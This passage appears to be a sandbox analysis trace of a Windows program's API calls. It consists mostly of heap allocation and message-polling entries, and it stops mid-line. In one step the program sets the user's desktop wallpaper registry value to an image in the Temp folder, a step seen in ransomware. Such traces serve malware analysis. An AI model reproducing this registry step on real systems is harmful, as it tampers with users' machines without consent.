Sleep (dwMilliseconds=0xa) [0238.976] timeGetTime () returned 0x117bae1 [0238.976] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0238.976] Sleep (dwMilliseconds=0xa) [0239.003] timeGetTime () returned 0x117bb00 [0239.003] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.003] Sleep (dwMilliseconds=0xa) [0239.019] timeGetTime () returned 0x117bb0f [0239.019] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.019] Sleep (dwMilliseconds=0xa) [0239.034] timeGetTime () returned 0x117bb1f [0239.034] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.034] Sleep (dwMilliseconds=0xa) [0239.073] timeGetTime () returned 0x117bb3e [0239.073] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.073] Sleep (dwMilliseconds=0xa) [0239.097] timeGetTime () returned 0x117bb5d [0239.097] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.097] Sleep (dwMilliseconds=0xa) [0239.112] timeGetTime () returned 0x117bb6d [0239.112] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0239.112] Sleep (dwMilliseconds=0xa) [0239.179] timeGetTime () returned 0x117bbac [0239.180] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.180] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0239.180] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0239.180] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0239.180] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0239.180] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0239.180] RegCloseKey (hKey=0x4e0) returned 0x0 [0239.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73568 | out: hHeap=0x2af0000) returned 1 [0239.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0239.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0239.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0239.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0239.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0239.181] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0239.181] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0239.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0239.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0239.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0239.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0239.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0239.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0239.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0239.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0239.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0239.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0239.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0239.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0239.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0239.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0239.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0239.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0239.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0239.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0239.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0239.184] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0239.184] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0239.184] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0239.184] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0239.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0239.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0239.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0239.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0239.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0239.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0239.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0239.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0239.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0239.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0239.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0239.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0239.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0239.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0239.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0239.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0239.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0239.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0239.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0239.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0239.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0239.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0239.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0239.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0239.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0239.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0239.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0239.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0239.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0239.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0239.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0239.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0239.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0239.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0239.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0239.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0239.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0239.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0239.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0239.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0239.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 